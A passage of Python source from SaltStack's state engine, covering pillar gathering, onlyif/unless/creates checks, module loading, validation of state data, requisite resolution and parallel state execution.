self.opts["pillar"] = self._gather_pillar()
# Reapply overrides on top of compiled pillar
if self._pillar_override:
self.opts["pillar"] = salt.utils.dictupdate.merge(
self.opts["pillar"],
self._pillar_override,
self.opts.get("pillar_source_merging_strategy", "smart"),
self.opts.get("renderer", "yaml"),
self.opts.get("pillar_merge_lists", False),
)
log.debug("Finished gathering pillar data for state run")
self.state_con = context or {}
self.load_modules()
self.active = set()
self.mod_init = set()
self.pre = {}
self.__run_num = 0
self.jid = jid
self.instance_id = str(id(self))
self.inject_globals = {}
self.mocked = mocked
def _gather_pillar(self):
"""
Whenever a state run starts, gather the pillar data fresh
"""
if self._pillar_override:
if self._pillar_enc:
try:
self._pillar_override = salt.utils.crypt.decrypt(
self._pillar_override,
self._pillar_enc,
translate_newlines=True,
renderers=getattr(self, "rend", None),
opts=self.opts,
valid_rend=self.opts["decrypt_pillar_renderers"],
)
except Exception as exc: # pylint: disable=broad-except
log.error("Failed to decrypt pillar override: %s", exc)
if isinstance(self._pillar_override, str):
# This can happen if an entire pillar dictionary was passed as
# a single encrypted string. The override will have been
# decrypted above, and should now be a stringified dictionary.
# Use the YAML loader to convert that to a Python dictionary.
try:
self._pillar_override = yamlloader.load(
self._pillar_override, Loader=yamlloader.SaltYamlSafeLoader
)
except Exception as exc: # pylint: disable=broad-except
log.error("Failed to load CLI pillar override")
log.exception(exc)
if not isinstance(self._pillar_override, dict):
log.error("Pillar override was not passed as a dictionary")
self._pillar_override = None
pillar = salt.pillar.get_pillar(
self.opts,
self.opts["grains"],
self.opts["id"],
self.opts["saltenv"],
pillar_override=self._pillar_override,
pillarenv=self.opts.get("pillarenv"),
)
return pillar.compile_pillar()
def _mod_init(self, low):
"""
Check the module initialization function, if this is the first run
of a state package that has a mod_init function, then execute the
mod_init function in the state module.
"""
# ensure that the module is loaded
try:
self.states[
"{}.{}".format(low["state"], low["fun"])
] # pylint: disable=W0106
except KeyError:
return
minit = "{}.mod_init".format(low["state"])
if low["state"] not in self.mod_init:
if minit in self.states._dict:
mret = self.states[minit](low)
if not mret:
return
self.mod_init.add(low["state"])
def _mod_aggregate(self, low, running, chunks):
"""
Execute the aggregation systems to runtime modify the low chunk
"""
agg_opt = self.functions["config.option"]("state_aggregate")
if "aggregate" in low:
agg_opt = low["aggregate"]
if agg_opt is True:
agg_opt = [low["state"]]
elif not isinstance(agg_opt, list):
return low
if low["state"] in agg_opt and not low.get("__agg__"):
agg_fun = "{}.mod_aggregate".format(low["state"])
if agg_fun in self.states:
try:
low = self.states[agg_fun](low, chunks, running)
low["__agg__"] = True
except TypeError:
log.error("Failed to execute aggregate for state %s", low["state"])
return low
def _run_check(self, low_data):
"""
Check that unless doesn't return 0, and that onlyif returns a 0.
"""
ret = {"result": False, "comment": []}
cmd_opts = {}
# Set arguments from cmd.run state as appropriate
POSSIBLE_CMD_ARGS = (
"cwd",
"root",
"runas",
"env",
"prepend_path",
"umask",
"timeout",
"success_retcodes",
)
for run_cmd_arg in POSSIBLE_CMD_ARGS:
cmd_opts[run_cmd_arg] = low_data.get(run_cmd_arg)
if "shell" in low_data:
cmd_opts["shell"] = low_data["shell"]
elif "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
if "onlyif" in low_data:
_ret = self._run_check_onlyif(low_data, cmd_opts)
ret["result"] = _ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
ret["skip_watch"] = _ret["skip_watch"]
if "unless" in low_data:
_ret = self._run_check_unless(low_data, cmd_opts)
# If either result is True, the returned result should be True
ret["result"] = _ret["result"] or ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
# If either result is True, the returned result should be True
ret["skip_watch"] = _ret["skip_watch"] or ret["skip_watch"]
if "creates" in low_data:
_ret = self._run_check_creates(low_data)
ret["result"] = _ret["result"] or ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
# If either result is True, the returned result should be True
ret["skip_watch"] = _ret["skip_watch"] or ret["skip_watch"]
return ret
def _run_check_function(self, entry):
"""Format slot args and run unless/onlyif function."""
fun = entry.pop("fun")
args = entry.pop("args") if "args" in entry else []
cdata = {"args": args, "kwargs": entry}
self.format_slots(cdata)
return self.functions[fun](*cdata["args"], **cdata["kwargs"])
def _run_check_onlyif(self, low_data, cmd_opts):
"""
Check that unless doesn't return 0, and that onlyif returns a 0.
"""
ret = {"result": False}
if not isinstance(low_data["onlyif"], list):
low_data_onlyif = [low_data["onlyif"]]
else:
low_data_onlyif = low_data["onlyif"]
def _check_cmd(cmd):
if cmd != 0 and ret["result"] is False:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
elif cmd == 0:
ret.update({"comment": "onlyif condition is true", "result": False})
for entry in low_data_onlyif:
if isinstance(entry, str):
try:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
except CommandExecutionError:
# Command failed, notify onlyif to skip running the item
cmd = 100
log.debug("Last command return code: %s", cmd)
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in onlyif: {}".format(entry)
log.warning(ret["comment"])
return ret
get_return = entry.pop("get_return", None)
result = self._run_check_function(entry)
if get_return:
result = salt.utils.data.traverse_dict_and_list(result, get_return)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif not result:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
else:
ret.update({"comment": "onlyif condition is true", "result": False})
else:
ret.update(
{
"comment": "onlyif execution failed, bad type passed",
"result": False,
}
)
return ret
def _run_check_unless(self, low_data, cmd_opts):
"""
Check that unless doesn't return 0, and that onlyif returns a 0.
"""
ret = {"result": False}
if not isinstance(low_data["unless"], list):
low_data_unless = [low_data["unless"]]
else:
low_data_unless = low_data["unless"]
def _check_cmd(cmd):
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
elif cmd != 0:
ret.update({"comment": "unless condition is false", "result": False})
for entry in low_data_unless:
if isinstance(entry, str):
try:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
except CommandExecutionError:
# Command failed, so notify unless to skip the item
cmd = 0
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in unless: {}".format(entry)
log.warning(ret["comment"])
return ret
get_return = entry.pop("get_return", None)
result = self._run_check_function(entry)
if get_return:
result = salt.utils.data.traverse_dict_and_list(result, get_return)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif result:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
else:
ret.update(
{"comment": "unless condition is false", "result": False}
)
else:
ret.update(
{
"comment": "unless condition is false, bad type passed",
"result": False,
}
)
# No reason to stop, return ret
return ret
def _run_check_cmd(self, low_data):
"""
Alter the way a successful state run is determined
"""
ret = {"result": False}
cmd_opts = {}
if "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
for entry in low_data["check_cmd"]:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "check_cmd determined the state succeeded",
"result": True,
}
)
elif cmd != 0:
ret.update(
{
"comment": "check_cmd determined the state failed",
"result": False,
}
)
return ret
return ret
def _run_check_creates(self, low_data):
"""
Check that listed files exist
"""
ret = {"result": False}
if isinstance(low_data["creates"], str) and os.path.exists(low_data["creates"]):
ret["comment"] = "{} exists".format(low_data["creates"])
ret["result"] = True
ret["skip_watch"] = True
elif isinstance(low_data["creates"], list) and all(
[os.path.exists(path) for path in low_data["creates"]]
):
ret["comment"] = "All files in creates exist"
ret["result"] = True
ret["skip_watch"] = True
else:
ret["comment"] = "Creates files not found"
ret["result"] = False
return ret
def reset_run_num(self):
"""
Rest the run_num value to 0
"""
self.__run_num = 0
def _load_states(self):
"""
Read the state loader value and loadup the correct states subsystem
"""
if self.states_loader == "thorium":
self.states = salt.loader.thorium(
self.opts, self.functions, {}
) # TODO: Add runners, proxy?
else:
self.states = salt.loader.states(
self.opts,
self.functions,
self.utils,
self.serializers,
context=self.state_con,
proxy=self.proxy,
)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts, self.state_con, utils=self.utils, proxy=self.proxy
)
if isinstance(data, dict):
if data.get("provider", False):
if isinstance(data["provider"], str):
providers = [{data["state"]: data["provider"]}]
elif isinstance(data["provider"], list):
providers = data["provider"]
else:
providers = {}
for provider in providers:
for mod in provider:
funcs = salt.loader.raw_mod(
self.opts, provider[mod], self.functions
)
if funcs:
for func in funcs:
f_key = "{}{}".format(mod, func[func.rindex(".") :])
self.functions[f_key] = funcs[func]
self.serializers = salt.loader.serializers(self.opts)
self._load_states()
self.rend = salt.loader.render(
self.opts,
self.functions,
states=self.states,
proxy=self.proxy,
context=self.state_con,
)
def module_refresh(self):
"""
Refresh all the modules
"""
log.debug("Refreshing modules...")
if self.opts["grains"].get("os") != "MacOS":
# In case a package has been installed into the current python
# process 'site-packages', the 'site' module needs to be reloaded in
# order for the newly installed package to be importable.
try:
reload_module(site)
except RuntimeError:
log.error(
"Error encountered during module reload. Modules were not reloaded."
)
except TypeError:
log.error(
"Error encountered during module reload. Modules were not reloaded."
)
self.load_modules()
if not self.opts.get("local", False) and self.opts.get("multiprocessing", True):
self.functions["saltutil.refresh_modules"]()
def check_refresh(self, data, ret):
"""
Check to see if the modules for this state instance need to be updated,
only update if the state is a file or a package and if it changed
something. If the file function is managed check to see if the file is a
possible module type, e.g. a python, pyx, or .so. Always refresh if the
function is recurse, since that can lay down anything.
"""
_reload_modules = False
if data.get("reload_grains", False):
log.debug("Refreshing grains...")
self.opts["grains"] = salt.loader.grains(self.opts)
_reload_modules = True
if data.get("reload_pillar", False):
log.debug("Refreshing pillar...")
self.opts["pillar"] = self._gather_pillar()
_reload_modules = True
if not ret["changes"]:
if data.get("force_reload_modules", False):
self.module_refresh()
return
if data.get("reload_modules", False) or _reload_modules:
# User explicitly requests a reload
self.module_refresh()
return
if data["state"] == "file":
if data["fun"] == "managed":
if data["name"].endswith((".py", ".pyx", ".pyo", ".pyc", ".so")):
self.module_refresh()
elif data["fun"] == "recurse":
self.module_refresh()
elif data["fun"] == "symlink":
if "bin" in data["name"]:
self.module_refresh()
elif data["state"] in ("pkg", "ports", "pip"):
self.module_refresh()
def verify_data(self, data):
"""
Verify the data, return an error statement if something is wrong
"""
errors = []
if "state" not in data:
errors.append('Missing "state" data')
if "fun" not in data:
errors.append('Missing "fun" data')
if "name" not in data:
errors.append('Missing "name" data')
if data["name"] and not isinstance(data["name"], str):
errors.append(
"ID '{}' {}is not formed as a string, but is a {}".format(
data["name"],
"in SLS '{}' ".format(data["__sls__"]) if "__sls__" in data else "",
type(data["name"]).__name__,
)
)
if errors:
return errors
full = data["state"] + "." + data["fun"]
if full not in self.states:
if "__sls__" in data:
errors.append(
"State '{}' was not found in SLS '{}'".format(full, data["__sls__"])
)
reason = self.states.missing_fun_string(full)
if reason:
errors.append("Reason: {}".format(reason))
else:
errors.append("Specified state '{}' was not found".format(full))
else:
# First verify that the parameters are met
aspec = salt.utils.args.get_function_argspec(self.states[full])
arglen = 0
deflen = 0
if isinstance(aspec.args, list):
arglen = len(aspec.args)
if isinstance(aspec.defaults, tuple):
deflen = len(aspec.defaults)
for ind in range(arglen - deflen):
if aspec.args[ind] not in data:
errors.append(
"Missing parameter {} for state {}".format(
aspec.args[ind], full
)
)
# If this chunk has a recursive require, then it will cause a
# recursive loop when executing, check for it
reqdec = ""
if "require" in data:
reqdec = "require"
if "watch" in data:
# Check to see if the service has a mod_watch function, if it does
# not, then just require
# to just require extend the require statement with the contents
# of watch so that the mod_watch function is not called and the
# requisite capability is still used
if "{}.mod_watch".format(data["state"]) not in self.states:
if "require" in data:
data["require"].extend(data.pop("watch"))
else:
data["require"] = data.pop("watch")
reqdec = "require"
else:
reqdec = "watch"
if reqdec:
for req in data[reqdec]:
reqfirst = next(iter(req))
if data["state"] == reqfirst:
if fnmatch.fnmatch(data["name"], req[reqfirst]) or fnmatch.fnmatch(
data["__id__"], req[reqfirst]
):
err = (
"Recursive require detected in SLS {} for"
" require {} in ID {}"
).format(data["__sls__"], req, data["__id__"])
errors.append(err)
return errors
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in high.items():
try:
if name.startswith("__"):
continue
except AttributeError:
pass
if not isinstance(name, str):
errors.append(
"ID '{}' in SLS '{}' is not formed as a string, but "
"is a {}. It may need to be quoted.".format(
name, body["__sls__"], type(name).__name__
)
)
if not isinstance(body, dict):
err = "The type {} in {} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if body[state] is None:
errors.append(
"ID '{}' in SLS '{}' contains a short declaration "
"({}) with a trailing colon. When not passing any "
"arguments to a state, the colon must be omitted.".format(
name, body["__sls__"], state
)
)
continue
if not isinstance(body[state], list):
errors.append(
"State '{}' in SLS '{}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, str):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{}" in state '
'"{}" in SLS "{}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst == "names":
if not isinstance(arg[argfirst], list):
errors.append(
"The 'names' argument in state "
"'{}' in SLS '{}' needs to be "
"formed as a list".format(name, body["__sls__"])
)
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
"The {} statement in state '{}' in "
"SLS '{}' needs to be formed as a "
"list".format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = OrderedDict(state=state)
for req in arg[argfirst]:
if isinstance(req, str):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {}"
" in SLS {} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
"Invalid requisite type '{}' "
"in state '{}', in SLS "
"'{}'. Requisite types must "
"not contain dots, did you "
"mean '{}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{}", '
"please check your syntax.\n"
).format(req_val)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{}" ID "{}" ID "{}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
"Multiple dictionaries defined in "
"argument of state '{}' in SLS '{}'".format(
name, body["__sls__"]
)
)
if not fun:
if state == "require" or state == "watch":
continue
errors.append(
"No function declared in state '{}' in SLS '{}'".format(
state, body["__sls__"]
)
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{}' in "
"SLS '{}'".format(state, body["__sls__"])
)
return errors
def verify_chunks(self, chunks):
"""
Verify the chunks in a list of low data structures
"""
err = []
for chunk in chunks:
err.extend(self.verify_data(chunk))
return err
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
def compile_high_data(self, high, orchestration_jid=None):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in high.items():
if name.startswith("__"):
continue
for state, run in body.items():
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if orchestration_jid is not None:
chunk["__orchestration_jid__"] = orchestration_jid
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, str):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in arg.items():
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
elif key == "state":
# Don't pass down a state override
continue
elif key == "name" and not isinstance(val, str):
# Invalid name, fall back to ID
chunk[key] = name
else:
chunk[key] = val
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(iter(entry.keys()))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order += 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def reconcile_extend(self, high):
"""
Pull the extend data and add it to the respective high data
"""
errors = []
if "__extend__" not in high:
return high, errors
ext = high.pop("__extend__")
for ext_chunk in ext:
for name, body in ext_chunk.items():
if name not in high:
state_type = next(x for x in body if not x.startswith("__"))
# Check for a matching 'name' override in high data
ids = find_name(name, state_type, high)
if len(ids) != 1:
errors.append(
"Cannot extend ID '{0}' in '{1}:{2}'. It is not "
"part of the high state.\n"
"This is likely due to a missing include statement "
"or an incorrectly typed ID.\nEnsure that a "
"state with an ID of '{0}' is available\nin "
"environment '{1}' and to SLS '{2}'".format(
name,
body.get("__env__", "base"),
body.get("__sls__", "base"),
)
)
continue
else:
name = ids[0][0]
for state, run in body.items():
if state.startswith("__"):
continue
if state not in high[name]:
high[name][state] = run
continue
# high[name][state] is extended by run, both are lists
for arg in run:
update = False
for hind in range(len(high[name][state])):
if isinstance(arg, str) and isinstance(
high[name][state][hind], str
):
# replacing the function, replace the index
high[name][state].pop(hind)
high[name][state].insert(hind, arg)
update = True
continue
if isinstance(arg, dict) and isinstance(
high[name][state][hind], dict
):
# It is an option, make sure the options match
argfirst = next(iter(arg))
if argfirst == next(iter(high[name][state][hind])):
# If argfirst is a requisite then we must merge
# our requisite with that of the target state
if argfirst in STATE_REQUISITE_KEYWORDS:
high[name][state][hind][argfirst].extend(
arg[argfirst]
)
# otherwise, its not a requisite and we are just extending (replacing)
else:
high[name][state][hind] = arg
update = True
if (
argfirst == "name"
and next(iter(high[name][state][hind])) == "names"
):
# If names are overwritten by name use the name
high[name][state][hind] = arg
if not update:
high[name][state].append(arg)
return high, errors
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, str):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(iter(exc.keys()))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
# There are sls excludes, find the associated ids
for name, body in high.items():
if name.startswith("__"):
continue
sls = body.get("__sls__", "")
if not sls:
continue
for ex_ in ex_sls:
if fnmatch.fnmatch(sls, ex_):
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
def requisite_in(self, high):
"""
Extend the data reference with requisite_in arguments
"""
req_in = {
"require_in",
"watch_in",
"onfail_in",
"onchanges_in",
"use",
"use_in",
"prereq",
"prereq_in",
}
req_in_all = req_in.union(
{"require", "watch", "onfail", "onfail_stop", "onchanges"}
)
extend = {}
errors = []
disabled_reqs = self.opts.get("disabled_requisites", [])
if not isinstance(disabled_reqs, list):
disabled_reqs = [disabled_reqs]
for id_, body in high.items():
if not isinstance(body, dict):
continue
for state, run in body.items():
if state.startswith("__"):
continue
for arg in run:
if isinstance(arg, dict):
# It is not a function, verify that the arg is a
# requisite in statement
if len(arg) < 1:
# Empty arg dict
# How did we get this far?
continue
# Split out the components
key = next(iter(arg))
if key not in req_in:
continue
if key in disabled_reqs:
log.warning(
"The %s requisite has been disabled, Ignoring.", key
)
continue
rkey = key.split("_")[0]
items = arg[key]
if isinstance(items, dict):
# Formatted as a single req_in
for _state, name in items.items():
# Not a use requisite_in
found = False
if name not in extend:
extend[name] = OrderedDict()
if "." in _state:
errors.append(
"Invalid requisite in {}: {} for "
"{}, in SLS '{}'. Requisites must "
"not contain dots, did you mean '{}'?".format(
rkey,
_state,
name,
body["__sls__"],
_state[: _state.find(".")],
)
)
_state = _state.split(".")[0]
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if next(iter(extend[name][_state][ind])) == rkey:
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
if isinstance(items, list):
# Formed as a list of requisite additions
hinges = []
for ind in items:
if not isinstance(ind, dict):
# Malformed req_in
if ind in high:
_ind_high = [
x
for x in high[ind]
if not x.startswith("__")
]
ind = {_ind_high[0]: ind}
else:
found = False
for _id in iter(high):
for state in [
state
for state in iter(high[_id])
if not state.startswith("__")
]:
for j in iter(high[_id][state]):
if (
isinstance(j, dict)
and "name" in j
):
if j["name"] == ind:
ind = {state: _id}
found = True
if not found:
continue
if len(ind) < 1:
continue
pstate = next(iter(ind))
pname = ind[pstate]
if pstate == "sls":
# Expand hinges here
hinges = find_sls_ids(pname, high)
else:
hinges.append((pname, pstate))
if "." in pstate:
errors.append(
"Invalid requisite in {}: {} for "
"{}, in SLS '{}'. Requisites must "
"not contain dots, did you mean '{}'?".format(
rkey,
pstate,
pname,
body["__sls__"],
pstate[: pstate.find(".")],
)
)
pstate = pstate.split(".")[0]
for tup in hinges:
name, _state = tup
if key == "prereq_in":
# Add prerequired to origin
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
extend[id_][state].append(
{"prerequired": [{_state: name}]}
)
if key == "prereq":
# Add prerequired to prereqs
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
extend[ext_id][_req_state].append(
{"prerequired": [{state: id_}]}
)
continue
if key == "use_in":
# Add the running states args to the
# use_in states
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
ext_args = state_args(ext_id, _state, high)
if ext_id not in extend:
extend[ext_id] = OrderedDict()
if _req_state not in extend[ext_id]:
extend[ext_id][_req_state] = []
ignore_args = req_in_all.union(ext_args)
for arg in high[id_][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(iter(arg.keys())) == "name":
continue
if next(iter(arg.keys())) == "names":
continue
extend[ext_id][_req_state].append(arg)
continue
if key == "use":
# Add the use state's args to the
# running state
ext_ids = find_name(name, _state, high)
for ext_id, _req_state in ext_ids:
if not ext_id:
continue
loc_args = state_args(id_, state, high)
if id_ not in extend:
extend[id_] = OrderedDict()
if state not in extend[id_]:
extend[id_][state] = []
ignore_args = req_in_all.union(loc_args)
for arg in high[ext_id][_req_state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(iter(arg.keys())) == "name":
continue
if next(iter(arg.keys())) == "names":
continue
extend[id_][state].append(arg)
continue
found = False
if name not in extend:
extend[name] = OrderedDict()
if _state not in extend[name]:
extend[name][_state] = []
extend[name]["__env__"] = body["__env__"]
extend[name]["__sls__"] = body["__sls__"]
for ind in range(len(extend[name][_state])):
if (
next(iter(extend[name][_state][ind]))
== rkey
):
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append({rkey: [{state: id_}]})
high["__extend__"] = []
for key, val in extend.items():
high["__extend__"].append({key: val})
req_in_high, req_in_errors = self.reconcile_extend(high)
errors.extend(req_in_errors)
return req_in_high, errors
def _call_parallel_target(self, name, cdata, low):
"""
The target function to call that will create the parallel thread/process
"""
# we need to re-record start/end duration here because it is impossible to
# correctly calculate further down the chain
utc_start_time = datetime.datetime.utcnow()
self.format_slots(cdata)
tag = _gen_tag(low)
try:
ret = self.states[cdata["full"]](*cdata["args"], **cdata["kwargs"])
except Exception as exc: # pylint: disable=broad-except
log.debug(
"An exception occurred in this state: %s",
exc,
exc_info_on_loglevel=logging.DEBUG,
)
trb = traceback.format_exc()
ret = {
"result": False,
"name": name,
"changes": {},
"comment": "An exception occurred in this state: {}".format(trb),
}
utc_finish_time = datetime.datetime.utcnow()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
ret["duration"] = duration
troot = os.path.join(self.opts["cachedir"], self.jid)
tfile = os.path.join(troot, salt.utils.hashutils.sha1_digest(tag))
if not os.path.isdir(troot):
try:
os.makedirs(troot)
except OSError:
# Looks like the directory was created between the check
# and the attempt, we are safe to pass
pass
with salt.utils.files.fopen(tfile, "wb+") as fp_:
fp_.write(msgpack_serialize(ret))
def call_parallel(self, cdata, low):
"""
Call the state defined in the given cdata in parallel
"""
# There are a number of possibilities to not have the cdata
# populated with what we might have expected, so just be smart
# enough to not raise another KeyError as the name is easily
# guessable and fallback in all cases to present the real
# exception to the user
name = (cdata.get("args") or [None])[0] or cdata["kwargs"].get("name")
if not name:
name = low.get("name", low.get("__id__"))
proc = salt.utils.process.Process(
target=self._call_parallel_target, args=(name, cdata, low)
)
proc.start()
ret = {
"name": name,
"result": None,
"changes": {},
"comment": "Started in a separate process",
"proc": proc,
}
return ret
@salt.utils.decorators.state.OutputUnifier("content_check", "unify")
def call(self, low, chunks=None, running=None, retries=1):
"""
Call a state directly with the low data structure, verify data
before processing.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
log.info(
"Running state [%s] at time %s",
low["name"].strip() if isinstance(low["name"], str) else low["name"],
local_start_time.time().isoformat(),
)
errors = self.verify_data(low)
if errors:
ret = {
"result": False,
"name": low["name"],
"changes": {},
"comment": "",
}
for err in errors:
ret["comment"] += "{}\n".format(err)
ret["__run_num__"] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
return ret
else:
ret = {"result": False, "name": low["name"], "changes": {}}
self.state_con["runas"] = low.get("runas", None)
if low["state"] == "cmd" and "password" in low:
self.state_con["runas_password"] = low["password"]
else:
self.state_con["runas_password"] = low.get("runas_password", None)
if not low.get("__prereq__"):
log.info(
"Executing state %s.%s for [%s]",
low["state"],
low["fun"],
low["name"].strip() if isinstance(low["name"], str) else low["name"],
)
if "provider" in low:
self.load_modules(low)
state_func_name = "{0[state]}.{0[fun]}".format(low)
cdata = salt.utils.args.format_call(
self.states[state_func_name],
low,
initial_ret={"full": state_func_name},
expected_extra_kws=STATE_INTERNAL_KEYWORDS,
)
inject_globals = {
# Pass a copy of the running dictionary, the low state chunks and
# the current state dictionaries.
# We pass deep copies here because we don't want any misbehaving
# state module to change these at runtime.
"__low__": immutabletypes.freeze(low),
"__running__": immutabletypes.freeze(running) if running else {},
"__instance_id__": self.instance_id,
"__lowstate__": immutabletypes.freeze(chunks) if chunks else {},
}
if "__env__" in low:
inject_globals["__env__"] = str(low["__env__"])
if self.inject_globals:
inject_globals.update(self.inject_globals)
if low.get("__prereq__"):
test = sys.modules[self.states[cdata["full"]].__module__].__opts__["test"]
sys.modules[self.states[cdata["full"]].__module__].__opts__["test"] = True
try:
# Let's get a reference to the salt environment to use within this
# state call.
#
# If the state function accepts an 'env' keyword argument, it
# allows the state to be overridden(we look for that in cdata). If
# that's not found in cdata, we look for what we're being passed in
# the original data, namely, the special dunder __env__. If that's
# not found we default to 'base'
req_list = ("unless", "onlyif", "creates")
if (
any(req in low for req in req_list)
and "{0[state]}.mod_run_check".format(low) not in self.states
):
ret.update(self._run_check(low))
if not self.opts.get("lock_saltenv", False):
# NOTE: Overriding the saltenv when lock_saltenv is blocked in
# salt/modules/state.py, before we ever get here, but this
# additional check keeps use of the State class outside of the
# salt/modules/state.py from getting around this setting.
if "saltenv" in low:
inject_globals["__env__"] = str(low["saltenv"])
